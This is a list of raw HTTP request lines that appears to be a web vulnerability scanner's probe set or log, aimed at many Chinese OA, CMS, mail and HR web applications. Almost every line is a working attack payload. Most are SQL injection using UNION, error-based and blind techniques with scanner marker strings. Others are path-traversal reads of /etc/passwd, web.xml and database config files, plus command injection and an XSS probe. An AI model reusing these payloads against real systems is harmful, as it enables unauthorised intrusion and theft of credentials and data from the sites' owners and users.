GET /Website/contentshow.jsp?ColumnCode=-12'%20union%20all%20select%20CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)%20from%20DUAL%20--
GET /Website/newsshow.jsp?id=-12%20UNION%20%20ALL%20SELECT%20%20NULL,NULL,NULL,NULL,CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL,NULL%20FROM%20DUAL
GET /FileManages/NetworkDisk/QxSet1.aspx?id=38%20%20and+1=char(106)+--
GET /website/approve/convenientSiteAction!getSXList.action?department=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&mill=488&style=4
GET /website/approve/approveSiteAction!listApproveModel.action?action=search&forward=searchmodel&issueTypename=&style=4&subType=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)
GET /website/approve/approveSiteAction!findApproveGuide.action?businesscode=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&location=&subcode=000
GET /bookdetail.aspx?id=-311%20union%20all%20Select%208%2CCHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8--
GET /znSearchAction.do?searchContext=-1%25%27%20UNION%20%20ALL%20SELECT%20%20NULL%2CNULL%2CCHR%28119%29%7C%7CCHR%28101%29%7C%7CCHR%2898%29%7C%7CCHR%28115%29%7C%7CCHR%2899%29%7C%7CCHR%2897%29%7C%7CCHR%28110%29%7C%7CCHR%2858%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7CCHR%28102%29%7C%7CCHR%28105%29%7C%7CCHR%28110%29%7C%7CCHR%28100%29%2CNULL%20FROM%20DUAL%20--
GET /opac/ckgc.jsp?kzh=-1')%20UNION%20%20ALL%20SELECT%20%20NULL,NULL,CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
GET /cms/framework/dbfile/createdbfile.jsp
HEAD /CN/item/downloadFile.jsp?filedisplay=../../web-inf/web.xml
GET /servlet/com.runqian.base.util.ReadJavaScriptServlet?file=../../../../../../../../../../etc/passwd
GET /FileManages/FolderQxSet/FileModify.aspx?type=2&fileid=3%20and+1=char(106)%20--&path=/1
GET /interface/ugo.php?OA_USER=aa%2527%20and%201=(select%201%20from(select%20count(*),concat(0x7c,0x484B3A693A31393937,0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%20and%20%25271%2527=%25271
GET /inc/finger/use_finger.php?USER_ID=-123%bf'%20and%20extractvalue(1,%20concat(0x5c,(select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201)))%23
GET /general/ems/query/search_excel.php?LOGIN_USER_ID=1%bf%27%20and%20extractvalue%281,%20concat%280x5c,%28select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201%29%29%29;%23&EMS_TYPE=1
GET /general/ems/manage/search_excel.php?LOGIN_USER_ID=1&EMS_TYPE=1%e5%27%20and%20extractvalue%281,%20concat%280x5c,%28select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201%29%29%29;%23
GET /backup/backup/backup.asp
GET /module/AIP/get_file.php?MODULE=/&ATTACHMENT_ID=.._webroot/inc/oa_config&ATTACHMENT_NAME=php
HEAD /general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php
GET /admini/item/iteminfo.aspx
GET /admini/newstopic/newstopicinfo.aspx
HEAD /download?fileName=/WEB-INF/web.xml
GET /RecruitstuManage/schoolinfo/DetailTheme.aspx?type=-1&topicid=1'%20and%201=char(106)%20--
POST /index_lnlqcj.php
GET /main/model/childcatalog/fileFind.do?fcode=00103&title=-111%25%27%20union%20all%20select%20null%2CCHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--&Submit=%CB%D1%CB%F7
GET /scrp/feedbackdetail.cfm?iSno=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)
GET /poweb/CDHelp.jsp?ISOID=3'%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,null,null,null,char%28104%29%2bchar%28107%29%2bchar%2858%29%2bchar%2849%29%2bchar%2858%29%2bchar%2849%29%2bchar%2857%29%2bchar%2857%29%2bchar%2855%29,null,null,null%20%20--%20
POST /information/OA_InforList.asp
GET /information/OA_PingLun.asp?PLType=1&POAID=54'%20and+1=char(106)%20--
POST /information_manager/informationmanager_upload.jsp?upload=1&dispControl=null&saveControl=null
POST /public/jsp/multiuploadfile.jsp?path=information&mode=add&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&photos=null
POST /public/jsp/smartUploadPic.jsp?path=information&mode=add&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jspx,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0
GET /jdwz/qtpage/findAllPoint.jsp?dtcxlb=vcsfjg&point_name=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%2CNULL--%20&vcsfjg=all
GET /jdwz/newsAction.do?flag=flag&NewsId=-12'%20union%20all%20select%20CHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29,12,12,12,12,12,12,12,12--
GET /caigou/NoticeList.aspx?Type=%27%2b+(select+convert(int%2cCHAR(106)%2bCHAR(105)%2bCHAR(120))+FROM+syscolumns)+%2b%27
GET /MailExportDo.asp?dellist=-1234%29%20or%203438%3DCONVERT%28INT%2C%28SELECT%20CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2b%28SELECT%20%28CASE%20WHEN%20%288986%3D8986%29%20THEN%20CHAR%28105%29%20ELSE%20CHAR%2848%29%20END%29%29%2bCHAR%2858%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29%29%29%20%20AND%20%281602%3D1602
POST /mailClassInfor.asp
GET /MessageInfoDis.asp?VOID=26%20and%201122%3DCONVERT%28INT%2C%28SELECT%20CHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%29%29%20--
GET /Include/DepartmentSet_Right.aspx?BI_ID=1'%20and%20(select%2b(char(106)%2bchar(120)%2bchar(106)%2bchar(120)))%3E0--
HEAD /jcms/m_1_9/user/down.jsp?pathfile=../jcms/m_1_9/user/down.jsp
GET /tophp.asp
POST /Manage/CalendarMemo/event.ashx
GET /RuvarHRM/web_common/file_download.aspx?hr_file_storage_id=1')%20and%20(select%20char(106)%2bchar(106))%3E0--
GET /SysManage/bbsSet/BoardInfo.aspx?board_id=-1'%20and%20(select%20char(106)%2bchar(106))%3E0--&level=1
GET /SysManage/include/SelectUnderling.aspx?u_underling=(select%20char(106)%2bchar(106)))--'
GET /SysManage/MailSet/select_mail.aspx?corp_id=(select%20char(106)%2bchar(106))%20--
GET /workflow/OfficeFileDownload.aspx?filename=1'%20and%20(select%20char(106)%2bchar(106))%3E0%20--
GET /SysManage/get_department.aspx?corpID=char(106)%2bchar(106)
GET /SysManage/role_setting_new.aspx?id=char(106)%2bchar(106)
GET /resource/jpk/search.jsp?coursetype=0&applyyear=0&university=%CF%C3%C3%C5%B4%F3%D1%A7&subject1=0&subject2=0&name=%25%27%20AND%201122%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%28104%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2849%29%7C%7CCHR%2857%29%7C%7CCHR%2857%29%7C%7CCHR%2855%29%29%29%20FROM%20DUAL%29%20AND%20%27%25%27%3D%27
GET /oa/download_attach.aspx?attach_id=1'%20and%20(select%20char(106)%2bchar(106))%3E0--
GET /SysManage/departmentset_corpshow.aspx?bi_id=1'%20and%20(select%20char(106)%2bchar(106))%3E0--
GET /SysManage/role_show.aspx?role_id=char(106)%2bchar(106)
GET /lates/index.html?username=123%27%2f%2a%2a%2fand%2f%2a%2a%2f%28seleselectct%2f%2a%2a%2f1%2f%2a%2a%2ffrom%2f%2a%2a%2f%28selselectect%2f%2a%2a%2fcount%28%2a%29%2Cconcat%280x7c%2C0x7765627363616E3A693A66696E64%2C0x7c%2Cfloor%28rand%280%29%2a2%29%29x%2f%2a%2a%2ffrom%2f%2a%2a%2finformation_schema.tables%2f%2a%2a%2fgroup%2f%2a%2a%2fby%2f%2a%2a%2fx%29a%29%23
POST /kaoqin/JiaoYanDis.asp
GET /admin/accounts_list.aspx?u_department_id=1'%20and%20(char(106)%2bchar(106))%3E0--
GET /tj/list.aspx?typeid=1'%20and%20(char(106)%2bchar(106))%3E0--
GET /filemanage/FolderPower.aspx?folder=1'%20and%20(char(106)%2bchar(106))%3E0--
GET /OperationManage/ViewSecrecyGuestBookMessage.aspx?sn=-12'%20and%20(char(106)%2bchar(106))%3E0--&sp=amdin&oid=0&type=2
POST /Manage/CalendarMemo/load.ashx
GET /php/report/include/ldap.inc
GET /php/report/include/util.inc
GET /php/report/include/config.inc
GET /php/report/lastlogin_list_export.php?time=1%20and%201=2%20union%20select%20md5(1122),2,3%20--%20&stime=hehe
GET /user/storage_explore.php
GET /grad/admin/domain_logo.php
GET /user/storage_fold_explore.php
GET /php/mailaction1.php?action=x&index=1.2;echo+123456%3Ex1.txt
POST /user/send_queue/upload_addition.php
GET /php/report/search_lastlogin.php?time=1%20and%201=2%20union%20select%20md5(1122),2,3%20--%20&stime=hehe
GET /php/bill/list_userinfo.php?domain=site.org&ok=1&cp=1%20union%20select%20md5(1122),2,3,4,5%23
POST /grad/admin/admin_logo_upload.php
GET /common/codewidget.jsp?code=1'%20AND%201=char(106)%20--
HEAD /download.ashx?files=../web.config
GET /mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise
GET /?question/search/%27%75nion%20select%201,2,3,4,5,6,7,8,md5(1122),10,11,12,13,14,15,16,17,18,19,20%23
HEAD /jcms/m_1_9/user/down.jsp?abspathfile=/etc/passwd
GET /Edit/ShowEdit.aspx?Dir=../../&OpenWords=TxtTagKey
GET /jis/manage/databak/showlog.jsp?path=../showlog.jsp
HEAD /download.jsp?path=UserFiles/../download.jsp
GET /tt/trade/register.asp?step=checkdup&checkname=ologinname&checkval=haha'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--&pk=0
GET /zwgkinfo/DepartMentInfoList.aspx?CategoryNum=-12'/**/and/**/1=char(106)--&DeptCode=
GET /jis/interface/offer.jsp?flag=user
HEAD /jis/down.jsp?pathfile=./down.jsp%00.jpg
GET /MockLogin.aspx
GET /mobile/user.php?act=order_list
GET /seeyon/management/status.jsp
HEAD /api/download.ashx?fid=nUDWEgdorSH4j/+9GiQTlA==
GET /monitoring?part=web.xml
GET /?/s_tag/hehe%25%27%20union%20select%201,2,3,md5(1122),5,6,7%20from%20go_admin%23
GET /download.action?fullPath=./WEB-INF/web.xml
GET /jcms/workflow/design/readxml.jsp?flowcode=../../../WEB-INF/config/dbconfig
POST /jis/update/update.jsp?fn_billstatus=U
GET /install/install.php
GET /public/minify.php?f=../ooxxooxxo/hehe.js
GET /admin/index.asp
GET /plus/outside.php?id=../template/default/style/yun_index.css%00
GET /productpic.aspx?id=100611)%20and%201=char(106)%20--
GET /jsp/util/file_download.jsp?filePath=../../../../../../../etc/passwd
GET /jsp/util/file_download.jsp?filePath=c:%5Cwindows%5Cwin.ini%00.xml
POST /jcms/m_5_5/m_5_5_3/import.jsp
POST /upload!uploadImg.action
GET /AuthReturn.aspx?APTokenResponse=a$8SOIYyiGVYBge5mdoY5nIeAueY7BixUtLdHqpy8o3RqM9hVnisaXAA==
POST /?do=index&mod=goods
GET /index.php/*123*/'union/**/select/**/1,2,3,4,5,6,7,8,md5(1122),10,11%23&action=getatlbyid
GET /cart.aspx?act=spikebuy&spikeid=3%20and%201=char(106)%2bchar(120)%20--
HEAD /webmail/client/mail/index.php?module=operate&action=down&file=./../../mainconfig.php
GET /MoreIndex.aspx?pkId=6434&kw=a'%20and%201=char(106)%20--&st=2&t=1
GET /RuvarHRM/web_include/select_baseinfo.aspx?bt_name=1')%20%20and%20(char(106)%2bchar(106))%3E0--
GET /Default.aspx?item=1)%20and%201=(char(106)%2bchar(106))%20--
GET /news/searchNewsAction.shtml?keywords='%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'
GET /zwfw/zwfwInfoAction!execute.shtml?action=5&sid='%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'
GET /news/newsInfoAction.shtml?infotype=-1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20and%20'at'='at
GET /client/checkuser.aspx?user=test'%20and%20char(106)%3E0--&pwd=1
GET /siteserver/userRole/modal_sendMail.aspx?From=User&UserNameCollection=test'+and+char(106)%2bchar(106)=0%20--
GET /admin/include/config.php?depth=../../templates/default/images/css/metinfo.css%00
GET /admin/login/login_check.php?depth=../../templates/default/images/css/metinfo.css%00&admin_index=1
GET /admin/system/lang/lang.func.php?depth=../../../public/js/public.js%00
GET /webusr/check.aspx?loginname=nosec'%20and%201=char(106)%2bchar(106)%20--%20
POST /plugins/phpdisk_client/client_sub.php?action=upload_file
GET /ExhibitionCenter.aspx?area=-12'%20and/**/1=char(106)/**/--
GET /SupplyList.aspx?parentid=88&classid=-12%20and/**/1=char(106)/**/%20--%20
GET /company/SearchProducts.aspx?id=115&keyname=ppp%25'%20and/**/1=char(106)/**/%20--%20
POST /Web/Login.aspx
POST /Web/KeySearch.aspx?searchid=1234
GET /portal/admin/setright.aspx?id=-1
GET /infolist.aspx?ClassId=5)%20and%201122=CONVERT(INT,(SELECT%20CHAR(84)%2bCHAR(97)%2bCHAR(105)%2bCHAR(87)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(103)%2bCHAR(111)%2bCHAR(58)%2bCHAR(104)%2bCHAR(111)%2bCHAR(109)%2bCHAR(101)))%20AND%20(1=1
GET /guestbook.aspx?do=show&id=1%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,char(106)%2bchar(106)%2bchar(108)%20--
HEAD /prog/filedown.php?pe_id=MQ==
POST /emlib4/system/DataSource/GetDataGridCtrlResult.aspx?_debug_=undefined
GET /emlib4/format/release/aspx/eml_userwh.aspx
GET /voteresult.aspx?activeid=-1%20UNION%20SELECT%201,char(106)%2bchar(106),3,4,5%20from%20syscolumns%20--
GET /kbase_list.aspx?kcatid=1%20UNION%20SELECT%201,2,char(106)%2bchar(106),4,5,6,7,8%20from%20syscolumns--
GET /getTopLinksPortalCategoriesAction.action?siteId=../../../../../../../../../../windows/win.ini%00.jpg
GET /letter/letter_detail.aspx?id=8'%20%20and+1=char(106)%2bchar(106)%20--
GET /cms/infopub/rss.jsp?channelcode=-A%27%20union%20all%20select%20char%28106%29%2bchar%28106%29%2Cnull%2Cnull%2Cnull%20--&maxnum=20
GET /web/doc_hit.jsp?documentid=-21%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)
GET /OperationManage/BlogMoreIndex.aspx?pkId=&blogId=1&kw=abc'%20and%201=char(106)%20--&st=1&t=1
HEAD /Tools/stream/FlvStream.ashx?file=./Index.aspx
GET /tj/total.aspx?act=other&typeid=1%27%20AND%209518%3DCONVERT%28INT%2C%28SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29%2b%28SELECT%20%28CASE%20WHEN%20%289518%3D9518%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%2bCHAR%28100%29%29%29%29%20AND%20%27xhJK%27%3D%27xhJK
GET /webConfigSet/configSetting.aspx?url=/login/index.aspx
GET /cms/cms/infopub/gjjs.jsp?pubtype=S&pubpath=dkt&startdate=&enddate=&topic=&content=&authorname=&origin=&description=&webappcode=A02&searchdir=A02&templetid=-21'%20union%20all%20select%20char(106)%2bchar(62)%2bchar(60),null,null%20--
POST /mydocument/download.aspx
GET /prog/get_passwd_1.php?user=hehe%3Cscript%3Ealert(42873)%3C/script%3E%20
GET /cjwtlist.aspx?t=(select+convert(int%2c@@version))
GET /FormBuilder/PrintFormList.aspx?file_id=1)/**/UNION/**/ALL/**/SELECT/**/CHR(97)%7C%7CCHR(60)%7C%7CCHR(99),NULL/**/FROM/**/DUAL/**/--
GET /module/sitesearch/index.jsp?keyword=&columnid=-1650)%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20&keyvalue=&webid=&currpage=2
GET /FormBuilder/yjzxList.aspx?id=1/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,CHR(106)%7C%7CCHR(60)%7C%7CCHR(106)/**/FROM/**/DUAL--
GET /FromBaoShan/LaborSpecial/PlacardView.aspx?info_id=1/**/UNION/**/ALL/**/SELECT/**/CHR(106)%7C%7CCHR(106)%7C%7CCHR(106),NULL,NULL,NULL/**/FROM/**/DUAL--
GET /goods/GoodsAdd.aspx?goodsid=1/**/AND/**/1122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)&flag=2
GET /pub/search/search_video_view.asp?id=3&mid=4%20and%201122=CONVERT(INT,(SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29))&yh=1
POST /index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
GET /main/findgbm2.asp?sql=SELECT+char%28106%29%2Bchar%28106%29%2Bchar%28106%29+FROM+Master%2E%2ESysDatabases+ORDER+BY+Name&sqlbak=SELECT+char%28106%29%2Bchar%28106%29%2Bchar%28106%29+FROM+Master%2E%2ESysDatabases+ORDER+BY+Name%20&px=
GET /ebsys/fceform/common/djframe.htm?isfile=release&djsn=eb_runsql
GET /nameedit.asp?table=bbs&id=1%20union%20all%20select%20null,null,null,null,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),null%20--&action=edit
GET /jis/front/sdgs/updateuser.jsp
HEAD /lm/down.jsp?pathfile=down.jsp
GET /website/dflz/dflzCjAction!caiwugk_list.action?orgCode=&orgName=&zuOrgCode=&zuOrgName=&cwgkbbh=-21'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--%20&cwgkbmc=
GET /Documents/FolderInfor.asp?POAID=0'%20or%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--&Source=0
GET /Documents/FolderInfor.asp?OAID=0%20or%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--&Source=0
POST /meetingroom/MeetingRoom_UseInfo.asp
GET /lm/front/api/opr_datacall.jsp?fn_billstatus=E&vc_id=-12'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL,NULL,NULL,NULL,NULL--
HEAD /downloadFile.action?path=index.jsp
GET /portal/getJsonData.action?userId=9090&ruleID=portal-common.getProFileInfo
GET /lm/front/noontimelist.jsp?flag=a&start=1&end=2&sysid=2'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL%20FROM%20DUAL%20--&groupid=4
POST /php/bill/print_addfeelog.php
GET /objectbox/selectx_userlist.jsp?fn_Keywords=1'%20UNION%20ALL%20SELECT%20NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL--%20&perm=&cPage=1&tiao=
GET /meetingroom/ShenQingInforDis.asp?OAID=-12%20AND%201993%20IN%20(char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100))%20---
GET /information/oa_infordislist.asp?class=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
GET /information/OA_Condition.asp?class=1&subclass=(CONVERT(INT,(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100))))---
